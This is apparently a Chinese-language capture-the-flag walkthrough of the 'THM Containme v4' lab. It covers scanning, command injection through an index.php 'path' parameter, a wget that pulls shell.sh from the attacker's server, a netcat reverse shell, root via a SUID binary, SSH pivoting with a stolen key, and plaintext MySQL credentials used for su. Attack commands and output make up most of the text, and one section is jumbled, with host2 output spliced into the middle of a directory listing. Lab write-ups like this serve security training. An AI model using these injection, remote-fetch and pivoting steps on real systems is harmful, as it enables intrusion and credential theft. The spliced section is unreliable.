THM Containme v4
识别目标主机IP地址
VirtualBox中启动THM Containme 靶机 kali Linux利用netdiscover识别其IP地址:
┌──(kali㉿kali)-[~/Vulnhub/THM_Containme]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.93.0/16 | Screen View: Unique Hosts
2 Captured ARP Req/Rep packets, from 2 hosts. Total size: 120
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:f8:f5:bb 1 60 PCS Systemtechnik GmbH
发现无法识别目标主机的IP地址,表中的两个IP地址并非率属于靶机。
因此需要首先解决靶机没有获取IP地址的问题:
重新启动靶机,一直按着Shift键,知道出现下面的界面:
然后按e键进入编辑模式,找到ro所在行,将ro改成rw single init=/bin/bash, 并把所在行的后面内容删除
按着Ctrl+x键重启靶机,ip a 命令得到网卡的名称,然后利用vi修改/etc/netplan/01-netcfg.yaml中的网卡名称,使其保持一致,然后重启靶机。
靶机没有分配到IP地址的问题得到解决:
(kali㉿kali)-[~/Vulnhub/THM_Containme]
└─$ sudo netdiscover -i eth1
Currently scanning: 172.16.4.0/16 | Screen View: Unique Hosts
4 Captured ARP Req/Rep packets, from 3 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:f8:f5:bb 2 120 PCS Systemtechnik GmbH
192.168.56.154 08:00:27:d0:a0:36 1 60 PCS Systemtechnik GmbH
NMAP扫描
──(kali㉿kali)-[~/Vulnhub/THM_Containme]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.154 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-06 02:49 EST
Nmap scan report for bogon (192.168.56.154)
Host is up (0.00014s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a6:3e:80:d9:b0:98:fd:7e:09:6d:34:12:f9:15:8a:18 (RSA)
| 256 ec:5f:8a:1d:59:b3:59:2f:49:ef:fb:f4:4a:d0:1d:7a (ECDSA)
|_ 256 b1:4a:22:dc:7f:60:e4:fc:08:0c:55:4f:e4:15:e0:fa (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
2222/tcp open EtherNetIP-1?
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
8022/tcp open ssh OpenSSH 7.7p1 Ubuntu 4ppa1+obfuscated (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 dc:ae:ea:27:3f:ab:10:ae:8c:2e:b3:0c:5b:d5:42:bc (RSA)
| 256 67:29:75:04:74:1b:83:d3:c8:de:6d:65:fe:e6:07:35 (ECDSA)
|_ 256 7f:7e:89:c4:e0:a0:da:92:6e:a6:70:45:fc:43:23:84 (ED25519)
MAC Address: 08:00:27:D0:A0:36 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 190.36 seconds
Get Access
浏览器访问: http://192.168.56.154,返回的是apche默认页面,源代码没有有价值的信息。
┌──(kali㉿kali)-[~/Vulnhub/THM_Containme]
└─$ curl http://192.168.56.154/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at 192.168.56.154 Port 80</address>
</body></html>
┌──(kali㉿kali)-[~/Vulnhub/THM_Containme]
└─$ gobuster dir -u http://192.168.56.154 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.154
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/11/06 02:55:59 Starting gobuster in directory enumeration mode
===============================================================
Progress: 218865 / 220561 (99.23%)===============================================================
2022/11/06 02:56:31 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/THM_Containme]
└─$ gobuster dir -u http://192.168.56.154 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.sh,.html
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.154
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Extensions: php,txt,sh,html
[+] Timeout: 10s
===============================================================
2022/11/06 02:58:25 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 10918]
/index.php (Status: 200) [Size: 329]
/info.php (Status: 200) [Size: 68960]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
Progress: 1102308 / 1102805 (99.95%)===============================================================
2022/11/06 03:01:57 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/THM_Containme]
└─$ nikto -h http://192.168.56.154
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.154
+ Target Hostname: 192.168.56.154
+ Target Port: 80
+ Start Time: 2022-11-06 03:04:01 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-powered-by header: PHP/7.2.24-0ubuntu0.18.04.8
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Multiple index files found: /index.html, /index.php
+ Server may leak inodes via ETags, header found with file /, inode: 2aa6, size: 5c730c0d1fa4e, mtime: gzip
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD
+ /info.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ 7915 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time: 2022-11-06 03:04:53 (GMT-5) (52 seconds)
---------------------------------------------------------------------------
┌──(kali㉿kali)-[~/Vulnhub/THM_Containme]
└─$ curl http://192.168.56.154/index.php
<html>
<body>
<pre>
total 28K
drwxr-xr-x 2 root root 4.0K Jul 16 2021 .
drwxr-xr-x 3 root root 4.0K Jul 15 2021 ..
-rw-r--r-- 1 root root 11K Jul 15 2021 index.html
-rw-r--r-- 1 root root 154 Jul 16 2021 index.php
-rw-r--r-- 1 root root 20 Jul 15 2021 info.php
<pre>
<!-- where is the path ? -->
</body>
</html>
返回页面提示: where is the path,可能这个页面有参数可以FUZZ
┌──(kali㉿kali)-[~/Vulnhub/THM_Containme]
└─$ wfuzz -c -u http://192.168.56.154/index.php?FUZZ=../../../../../../etc/passwd -w /usr/share/seclists/Discovery/Web-Content/common.txt --hw 60
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.56.154/index.php?FUZZ=../../../../../../etc/passwd
Total requests: 4713
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000003025: 200 11 L 22 W 149 Ch "path"
/usr/lib/python3/dist-packages/wfuzz/wfuzz.py:80: UserWarning:Finishing pending requests...
Total time: 0
Processed Requests: 4587
Filtered Requests: 4586
Requests/sec.: 0
发现了参数path,手动确认一下:
┌──(kali㉿kali)-[~/Vulnhub/THM_Containme]
└─$ curl http://192.168.56.154/index.php?path=../../../../../../../etc/
<html>
<body>
<pre>
total 676K
drwxr-xr-x 81 root root 4.0K Jul 30 2021 .
drwxr-xr-x 22 root root 4.0K Jul 15 2021 ..
-rw------- 1 root root 0 Jun 29 2021 .pwd.lock
drwxr-xr-x 3 root root 4.0K Jun 29 2021 NetworkManager
drwxr-xr-x 3 root root 4.0K Jun 29 2021 X11
drwxr-xr-x 3 root root 4.0K Jun 29 2021 acpi
-rw-r--r-- 1 root root 3.0K Jun 29 2021 adduser.conf
drwxr-xr-x 2 root root 4.0K Jul 16 2021 alternatives
drwxr-xr-x 8 root root 4.0K Jul 19 2021 apache2
drwxr-xr-x 3 root root 4.0K Jun 29 2021 apparmor
drwxr-xr-x 9 root root 4.0K Jun 29 2021 apparmor.d
drwxr-xr-x 3 root root 4.0K Jun 29 2021 apport
drwxr-xr-x 7 root root 4.0K Jun 29 2021 apt
-rw-r----- 1 root daemon 144 Feb 20 2018 at.deny
-rw-r--r-- 1 root root 2.3K Apr 4 2018 bash.bashrc
drwxr-xr-x 2 root root 4.0K Jun 29 2021 bash_completion.d
-rw-r--r-- 1 root root 367 Jan 27 2016 bindresvport.blacklist
drwxr-xr-x 2 root root 4.0K May 27 2021 binfmt.d
drwxr-xr-x 3 root root 4.0K Jun 29 2021 ca-certificates
-rw-r--r-- 1 root root 5.6K Jun 29 2021 ca-certificates.conf
drwxr-xr-x 4 root root 4.0K Jun 29 2021 cloud
drwxr-xr-x 2 root root 4.0K Jun 29 2021 console-setup
drwxr-xr-x 2 root root 4.0K Jul 15 2021 cron.d
drwxr-xr-x 2 root root 4.0K Jul 15 2021 cron.daily
drwxr-xr-x 2 root root 4.0K Jun 29 2021 cron.hourly
drwxr-xr-x 2 root root 4.0K Jun 29 2021 cron.monthly
drwxr-xr-x 2 root root 4.0K Jun 29 2021 cron.weekly
-rw-r--r-- 1 root root 722 Nov 15 2017 crontab
drwxr-xr-x 2 root root 4.0K Jun 29 2021 cryptsetup-initramfs
-rw-r--r-- 1 root root 54 Jun 29 2021 crypttab
drwxr-xr-x 4 root root 4.0K Jun 29 2021 dbus-1
-rw-r--r-- 1 root root 2.9K Feb 28 2018 debconf.conf
-rw-r--r-- 1 root root 11 Jun 25 2017 debian_version
drwxr-xr-x 3 root root 4.0K Jul 15 2021 default
-rw-r--r-- 1 root root 604 Aug 13 2017 deluser.conf
drwxr-xr-x 2 root root 4.0K Jun 29 2021 depmod.d
drwxr-xr-x 4 root root 4.0K Jun 29 2021 dhcp
drwxr-xr-x 2 root root 4.0K Jun 29 2021 dnsmasq.d
drwxr-xr-x 2 root root 4.0K Jun 29 2021 dnsmasq.d-available
drwxr-xr-x 4 root root 4.0K Jun 29 2021 dpkg
-rw-r--r-- 1 root root 35 Jun 29 2021 ec2_version
-rw-r--r-- 1 root root 106 Jun 29 2021 environment
-rw-r--r-- 1 root root 1.3K Jun 28 2018 ethertypes
-rw-r--r-- 1 root root 43 Jun 29 2021 fstab
-rw-r--r-- 1 root root 280 Jun 20 2014 fuse.conf
-rw-r--r-- 1 root root 2.6K Feb 1 2018 gai.conf
drwxr-xr-x 2 root root 4.0K Jun 29 2021 groff
-rw-r--r-- 1 root root 639 Jul 19 2021 group
-rw-r--r-- 1 root root 720 Jul 15 2021 group-
-rw-r----- 1 root shadow 530 Jul 19 2021 gshadow
-rw-r----- 1 root shadow 607 Jul 15 2021 gshadow-
drwxr-xr-x 3 root root 4.0K Jun 29 2021 gss
-rw-r--r-- 1 root root 92 Apr 9 2018 host.conf
-rw-r--r-- 1 root root 6 Jul 14 2021 hostname
-rw-r--r-- 1 root root 221 Jun 28 2021 hosts
-rw-r--r-- 1 root root 411 Jun 29 2021 hosts.allow
-rw-r--r-- 1 root root 711 Jun 29 2021 hosts.deny
drwxr-xr-x 2 root root 4.0K Jul 30 2021 init.d
-rw-r--r-- 1 root root 1.8K May 15 2017 inputrc
drwxr-xr-x 4 root root 4.0K Jun 29 2021 iproute2
drwxr-xr-x 2 root root 4.0K Jun 29 2021 iscsi
-rw-r--r-- 1 root root 26 Aug 13 2020 issue
-rw-r--r-- 1 root root 19 Aug 13 2020 issue.net
drwxr-xr-x 4 root root 4.0K Jun 29 2021 kernel
-rw-r--r-- 1 root root 110 Jun 29 2021 kernel-img.conf
-rw-r--r-- 1 root root 18K Jul 30 2021 ld.so.cache
-rw-r--r-- 1 root root 34 Jan 27 2016 ld.so.conf
drwxr-xr-x 2 root root 4.0K Jun 29 2021 ld.so.conf.d
drwxr-xr-x 2 root root 4.0K Jun 29 2021 ldap
-rw-r--r-- 1 root root 267 Apr 9 2018 legal
-rw-r--r-- 1 root root 191 Feb 7 2018 libaudit.conf
lrwxrwxrwx 1 root root 30 Jul 15 2021 localtime -> /usr/share/zoneinfo/US/Central
drwxr-xr-x 4 root root 4.0K Jun 29 2021 logcheck
-rw-r--r-- 1 root root 11K Jan 25 2018 login.defs
drwxr-xr-x 2 root root 4.0K Jul 15 2021 logrotate.d
-rw-r--r-- 1 root root 105 Aug 13 2020 lsb-release
drwxr-xr-x 3 root root 4.0K Jun 29 2021 lvm
-r--r--r-- 1 root root 33 Jul 14 2021 machine-id
-rw-r--r-- 1 root root 111 May 12 2020 magic
-rw-r--r-- 1 root root 111 May 12 2020 magic.mime
-rw-r--r-- 1 root root 1.9K Jun 29 2021 mailcap
-rw-r--r-- 1 root root 449 Jul 15 2016 mailcap.order
drwxr-xr-x 2 root root 4.0K Jun 29 2021 mdadm
-rw-r--r-- 1 root root 24K Jul 15 2016 mime.types
-rw-r--r-- 1 root root 812 Mar 24 2018 mke2fs.conf
drwxr-xr-x 2 root root 4.0K Jun 29 2021 modprobe.d
-rw-r--r-- 1 root root 195 Jun 29 2021 modules
drwxr-xr-x 2 root root 4.0K Jul 30 2021 modules-load.d
lrwxrwxrwx 1 root root 19 Jun 29 2021 mtab -> ../proc/self/mounts
-rw-r--r-- 1 root root 8.9K Feb 13 2018 nanorc
drwxr-xr-x 2 root root 4.0K Jul 15 2021 netplan
drwxr-xr-x 4 root root 4.0K Jun 29 2021 network
drwxr-xr-x 6 root root 4.0K Jun 29 2021 networkd-dispatcher
-rw-r--r-- 1 root root 91 Apr 9 2018 networks
-rw-r--r-- 1 root root 513 Jun 29 2021 nsswitch.conf
drwxr-xr-x 2 root root 4.0K Jun 29 2021 opt
lrwxrwxrwx 1 root root 21 Aug 13 2020 os-release -> ../usr/lib/os-release
-rw-r--r-- 1 root root 112 Jun 29 2021 overlayroot.local.conf
-rw-r--r-- 1 root root 552 Apr 4 2018 pam.conf
drwxr-xr-x 2 root root 4.0K Jul 30 2021 pam.d
-rw-r--r-- 1 root root 1.4K Jul 19 2021 passwd
-rw-r--r-- 1 root root 1.5K Jul 16 2021 passwd-
drwxr-xr-x 4 root root 4.0K Jun 29 2021 perl
drwxr-xr-x 3 root root 4.0K Jul 15 2021 php
drwxr-xr-x 3 root root 4.0K Jun 29 2021 pm
drwxr-xr-x 2 root root 4.0K Jun 29 2021 pollinate
-rw-r--r-- 1 root root 596 Jul 15 2021 profile
drwxr-xr-x 2 root root 4.0K Jun 29 2021 profile.d
-rw-r--r-- 1 root root 2.9K Dec 25 2016 protocols
drwxr-xr-x 2 root root 4.0K Jun 29 2021 python3
drwxr-xr-x 2 root root 4.0K Jun 29 2021 python3.6
drwxr-xr-x 2 root root 4.0K Jul 15 2021 rc0.d
drwxr-xr-x 2 root root 4.0K Jul 15 2021 rc1.d
drwxr-xr-x 2 root root 4.0K Jul 15 2021 rc2.d
drwxr-xr-x 2 root root 4.0K Jul 15 2021 rc3.d
drwxr-xr-x 2 root root 4.0K Jul 15 2021 rc4.d
drwxr-xr-x 2 root root 4.0K Jul 15 2021 rc5.d
drwxr-xr-x 2 root root 4.0K Jul 15 2021 rc6.d
drwxr-xr-x 2 root root 4.0K Jun 29 2021 rcS.d
lrwxrwxrwx 1 root root 39 Jun 29 2021 resolv.conf -> ../run/systemd/resolve/stub-resolv.conf
-rwxr-xr-x 1 root root 268 Jul 21 2017 rmt
-rw-r--r-- 1 root root 887 Dec 25 2016 rpc
drwxr-xr-x 2 root root 4.0K Jun 29 2021 rsyslog.d
-rw-r--r-- 1 root root 4.1K Jan 25 2018 securetty
drwxr-xr-x 4 root root 4.0K Jun 29 2021 security
drwxr-xr-x 2 root root 4.0K Jun 29 2021 selinux
-rw-r--r-- 1 root root 19K Dec 25 2016 services
-rw-r----- 1 root shadow 841 Jul 19 2021 shadow
-rw-r----- 1 root shadow 966 Jul 15 2021 shadow-
-rw-r--r-- 1 root root 73 Jun 29 2021 shells
drwxr-xr-x 2 root root 4.0K Jun 29 2021 skel
drwxr-xr-x 6 root root 4.0K Jun 29 2021 sos
drwxr-xr-x 2 root root 4.0K Jul 15 2021 ssh
drwxr-xr-x 4 root root 4.0K Jun 29 2021 ssl
-rw-r--r-- 1 root root 53 Jul 19 2021 subgid
-rw-r--r-- 1 root root 73 Jul 15 2021 subgid-
-rw-r--r-- 1 root root 53 Jul 19 2021 subuid
-rw-r--r-- 1 root root 73 Jul 15 2021 subuid-
-r--r----- 1 root root 755 Jan 19 2021 sudoers
drwxr-x--- 2 root root 4.0K Jul 14 2021 sudoers.d
-rw-r--r-- 1 root root 2.7K Jan 17 2018 sysctl.conf
drwxr-xr-x 2 root root 4.0K Jul 30 2021 sysctl.d
drwxr-xr-x 5 root root 4.0K Jul 30 2021 systemd
drwxr-xr-x 2 root root 4.0K Jun 29 2021 terminfo
-rw-r--r-- 1 root root 11 Jul 15 2021 timezone
drwxr-xr-x 2 root root 4.0K Jun 29 2021 tmpfiles.d
-rw-r--r-- 1 root root 1.3K Feb 25 2018 ucf.conf
drwxr-xr-x 4 root root 4.0K Jul 30 2021 udev
drwxr-xr-x 3 root root 4.0K Jun 29 2021 ufw
drwxr-xr-x 3 root root 4.0K Jun 29 2021 update-manager
drwxr-xr-x 2 root root 4.0K Jun 29 2021 update-motd.d
drwxr-xr-x 2 root root 4.0K May 14 2021 update-notifier
-rw-r--r-- 1 root root 4.9K Apr 8 2019 wgetrc
drwxr-xr-x 4 root root 4.0K Jun 29 2021 xdg
<pre>
<!-- where is the path ? -->
</body>
</html>
┌──(kali㉿kali)-[~/Vulnhub/THM_Containme]
└─$ curl http://192.168.56.154/index.php?path=../../../../../../../etc/passwd
<html>
<body>
<pre>
-rw-r--r-- 1 root root 1.4K Jul 19 2021 ../../../../../../../etc/passwd
<pre>
<!-- where is the path ? -->
</body>
</html>
┌──(kali㉿kali)-[~/Vulnhub/THM_Containme]
└─$
脚本的功能应该不是显示文件内容,而是ls -alh
做命令组合
┌──(kali㉿kali)-[~/Vulnhub/THM_Containme]
└─$ curl http://192.168.56.154/index.php?path=../../../../../../../etc/passwd
<html>
<body>
<pre>
-rw-r--r-- 1 root root 1.4K Jul 19 2021 ../../../../../../../etc/passwd
<pre>
<!-- where is the path ? -->
</body>
</html>
┌──(kali㉿kali)-[~/Vulnhub/THM_Containme]
└─$ curl "http://192.168.56.154/index.php?path=../../../../../../../etc/passwd;id"
<html>
<body>
<pre>
-rw-r--r-- 1 root root 1.4K Jul 19 2021 ../../../../../../../etc/passwd
uid=33(www-data) gid=33(www-data) groups=33(www-data)
<pre>
<!-- where is the path ? -->
</body>
</html>
注意完整URL要加上引号,否则id会执行本地的Kali命令
┌──(kali㉿kali)-[~/Vulnhub/THM_Containme]
└─$ curl "http://192.168.56.154/index.php?path=../../../../../../../etc/passwd;cat /etc/passwd"
curl: (3) URL using bad/illegal format or missing URL
似乎不能执行cat命令
接下来看能不能建立反向shell
不能直接利用命令建立shell,在Kali 本地建立shell.sh脚本,然后上传到目标靶机
┌──(kali㉿kali)-[~/Vulnhub/THM_Containme]
└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.56.154 - - [06/Nov/2022 03:24:42] "GET /shell.sh HTTP/1.1" 200 -
http://192.168.56.154/index.php?path=../../../../../../../etc/;wget%20-P%20/tmp%20http://192.168.56.137:8000/shell.sh
成功的拿到了shell
┌──(kali㉿kali)-[~/Vulnhub/THM_Containme]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.154] 40230
bash: cannot set terminal process group (243): Inappropriate ioctl for device
bash: no job control in this shell
www-data@host1:/var/www/html$
www-data@host1:/var/www/html$ find / -type f -perm /4000 2>/dev/null
find / -type f -perm /4000 2>/dev/null
/usr/share/man/zh_TW/crypt
/usr/bin/newuidmap
/usr/bin/newgidmap
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/at
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/gpasswd
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/bin/mount
/bin/ping
/bin/su
/bin/umount
/bin/fusermount
/bin/ping6
www-data@host1:/var/www/html$ cd /usr/share/man/zh_TW
cd /usr/share/man/zh_TW
www-data@host1:/usr/share/man/zh_TW$ ./crypt mike
./crypt mike
░█████╗░██████╗░██╗░░░██╗██████╗░████████╗░██████╗██╗░░██╗███████╗██╗░░░░░██╗░░░░░
██╔══██╗██╔══██╗╚██╗░██╔╝██╔══██╗╚══██╔══╝██╔════╝██║░░██║██╔════╝██║░░░░░██║░░░░░
██║░░╚═╝██████╔╝░╚████╔╝░██████╔╝░░░██║░░░╚█████╗░███████║█████╗░░██║░░░░░██║░░░░░
██║░░██╗██╔══██╗░░╚██╔╝░░██╔═══╝░░░░██║░░░░╚═══██╗██╔══██║██╔══╝░░██║░░░░░██║░░░░░
╚█████╔╝██║░░██║░░░██║░░░██║░░░░░░░░██║░░░██████╔╝██║░░██║███████╗███████╗███████╗
░╚════╝░╚═╝░░╚═╝░░░╚═╝░░░╚═╝░░░░░░░░╚═╝░░░╚═════╝░╚═╝░░╚═╝╚══════╝╚══════╝╚══════╝
id
id
root@host1:/usr/share/man/zh_TW# id
uid=0(root) gid=33(www-data) groups=33(www-data)
root@host1:/usr/share/man/zh_TW#
似乎在容器中。
www-data@host1:/home/mike$ find / -type f -perm /4000 2>/dev/null
find / -type f -perm /4000 2>/dev/null
/usr/share/man/zh_TW/crypt
/usr/bin/newuidmap
/usr/bin/newgidmap
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/at
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/gpasswd
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/bin/mount
/bin/ping
/bin/su
/bin/umount
/bin/fusermount
/bin/ping6
www-data@host1:/home/mike$ cd /usr/share/man/zh_TW
cd /usr/share/man/zh_TW
www-data@host1:/usr/share/man/zh_TW$ ./crypt mike
./crypt mike
░█████╗░██████╗░██╗░░░██╗██████╗░████████╗░██████╗██╗░░██╗███████╗██╗░░░░░██╗░░░░░
██╔══██╗██╔══██╗╚██╗░██╔╝██╔══██╗╚══██╔══╝██╔════╝██║░░██║██╔════╝██║░░░░░██║░░░░░
██║░░╚═╝██████╔╝░╚████╔╝░██████╔╝░░░██║░░░╚█████╗░███████║█████╗░░██║░░░░░██║░░░░░
██║░░██╗██╔══██╗░░╚██╔╝░░██╔═══╝░░░░██║░░░░╚═══██╗██╔══██║██╔══╝░░██║░░░░░██║░░░░░
╚█████╔╝██║░░██║░░░██║░░░██║░░░░░░░░██║░░░██████╔╝██║░░██║███████╗███████╗███████╗
░╚════╝░╚═╝░░╚═╝░░░╚═╝░░░╚═╝░░░░░░░░╚═╝░░░╚═════╝░╚═╝░░╚═╝╚══════╝╚══════╝╚══════╝
idroot@host1:/usr/share/man/zh_TW#
id
uid=0(root) gid=33(www-data) groups=33(www-data)
root@host1:/usr/share/man/zh_TW# cd home
cd home
bash: cd: home: No such file or directory
root@host1:/usr/share/man/zh_TW# cd /home
cd /home
root@host1:/home# ls
ls
mike
root@host1:/home# cd mike
cd mike
root@host1:/home/mike# ls -alh
ls -alh
total 384K
drwxr-xr-x 5 mike mike 4.0K Jul 30 2021 .
drwxr-xr-x 3 root root 4.0K Jul 19 2021 ..
lrwxrwxrwx 1 root mike 9 Jul 19 2021 .bash_history -> /dev/null
-rw-r--r-- 1 mike mike 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 mike mike 3.7K Apr 4 2018 .bashrc
drwx------ 2 mike mike 4.0K Jul 30 2021 .cache
drwx------ 3 mike mike 4.0K Jul 30 2021 .gnupg
-rw-r--r-- 1 mike mike 807 Apr 4 2018 .profile
drwx------ 2 mike mike 4.0K Jul 19 2021 .ssh
-rwxr-xr-x 1 mike mike 351K Jul 30 2021 1cryptupx
root@host1:/home/mike# cd .ssh
cd .ssh
root@host1:/home/mike/.ssh# ls -alh
ls -alh
total 16K
drwx------ 2 mike mike 4.0K Jul 19 2021 .
drwxr-xr-x 5 mike mike 4.0K Jul 30 2021 ..
-rw------- 1 mike mike 1.7K Jul 15ul 15 2021 .ssh
-rw-r--r-- 1 root root 32 Jul 16 2021 mike
-rw------- 1 root root 218 Jul 16 2021 mike.zip
root@host2:~# cat mike
cat mike
THM{_Y0U_F0UND_TH3_C0NTA1N3RS_}
root@host2:~#
因为靶机里没有nmap,需要设法将nmap上传至靶机,而靶机没有internet环境
需要设法将Nmap上传至目标。
2021 id_rsa
-rw-r--r-- 1 mike mike 392 Jul 15 2021 id_rsa.pub
root@host1:/home/mike/.ssh# ssh -i id_rsa [email protected]
ssh -i id_rsa [email protected]
The authenticity of host '172.16.20.6 (172.16.20.6)' can't be established.
ECDSA key fingerprint is SHA256:L1BKa1sC+LgClbpAX5jJvzYALuhUDf1zEzhPc/C++/8.
Are you sure you want to continue connecting (yes/no)? yes
yes
Warning: Permanently added '172.16.20.6' (ECDSA) to the list of known hosts.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Last login: Mon Jul 19 20:23:18 2021 from 172.16.20.2
mike@host2:~$ id
id
uid=1001(mike) gid=1001(mike) groups=1001(mike)
mike@host2:~$ ss -tunlp
ss -tunlp
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port
udp UNCONN 0 0 127.0.0.53%lo:53 0.0.0.0:*
tcp LISTEN 0 80 127.0.0.1:3306 0.0.0.0:*
tcp LISTEN 0 128 127.0.0.53%lo:53 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 128 [::]:22 [::]:*
mike@host2:~$ mysql -umkike -ppassword
mysql -umkike -ppassword
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'mkike'@'localhost' (using password: YES)
mike@host2:~$ mysql -umike -ppassword
mysql -umike -ppassword
mysql: [Warning] Using a password on the command line interface can be insecure.
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 3
Server version: 5.7.34-0ubuntu0.18.04.1 (Ubuntu)
Copyright (c) 2000, 2021, Oracle and/or its affiliates.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| accounts |
+--------------------+
2 rows in set (0.01 sec)
mysql> use accounts;
use accounts;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
show tables;
+--------------------+
| Tables_in_accounts |
+--------------------+
| users |
+--------------------+
1 row in set (0.00 sec)
mysql> select * from users;
select * from users;
+-------+---------------------+
| login | password |
+-------+---------------------+
| root | bjsig4868fgjjeog |
| mike | WhatAreYouDoingHere |
+-------+---------------------+
2 rows in set (0.00 sec)
mysql> quit
quit
Bye
mike@host2:~$ su - root
su - root
Password: bjsig4868fgjjeog
root@host2:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@host2:~# ls -alh
ls -alh
total 28K
drwx------ 4 root root 4.0K Jul 19 2021 .
drwxr-xr-x 22 root root 4.0K Jun 29 2021 ..
lrwxrwxrwx 1 root root 9 Jul 19 2021 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3.1K Apr 9 2018 .bashrc
drwxr-xr-x 3 root root 4.0K Jul 15 2021 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
drwx------ 2 root root 4.0K Jul 15 2021 .ssh
-rw------- 1 root root 218 Jul 16 2021 mike.zip
root@host2:~# unzip mike.zip
unzip mike.zip
Archive: mike.zip
[mike.zip] mike password:
skipping: mike incorrect password
root@host2:~# unzip mike.zip
unzip mike.zip
Archive: mike.zip
[mike.zip] mike password: WhatAreYouDoingHere
